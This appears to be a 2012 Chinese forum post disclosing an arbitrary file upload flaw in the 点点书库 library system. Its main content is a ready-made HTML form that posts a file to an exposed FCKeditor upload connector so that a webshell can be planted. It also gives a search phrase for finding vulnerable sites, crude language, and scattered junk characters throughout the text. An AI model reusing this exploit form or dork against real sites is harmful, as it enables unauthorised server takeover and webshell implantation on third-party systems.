主题:图书馆系统任意文件上传漏洞
; v' H) F) Y' |9 J t) U 作者:冰锋刺客
* |& m6 m$ o- w% m, h5 W+ c% k 厂商:点击书(dianjishu.com)
. P# M0 J3 u) J! ^+ ?+ [ 日期:2012-6-21: W7 ^2 E) a4 b J, B4 I- c
4 F2 t0 o7 F+ [8 S& n1 O
I 概述
$ s u" m- V1 ^ 点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell; Y. {; e! u- R" k! S) J
II 简介9 D E# g, [) J$ d& M
关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
% x* Y9 n; }, j' U: V/ | 补充一个漏洞& C$ w, Z) m4 B7 a$ s
<form id="frmUpload" enctype="multipart/form-data"
0 ^( [, L# D% l1 {5 n action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>5 X5 i0 D7 X( B& N" Q9 ^0 \
<input id="btnUpload" type="submit" value="操翻他">
" r: J8 f; o4 m2 V! z0 h. B </form>( I$ j/ x5 z1 ~8 c5 Q$ ]1 L
你们懂的
4 }/ _% M3 j* t7 S9 _; N 那傻逼提供还需要改包.
- o& I- r! B! W7 F$ l4 P3 ? 自己看了下源代码发现fckeditor
7 E) R0 k" y; ^( {* I 直接秒杀
; ~+ _% }4 y5 @9 j4 T |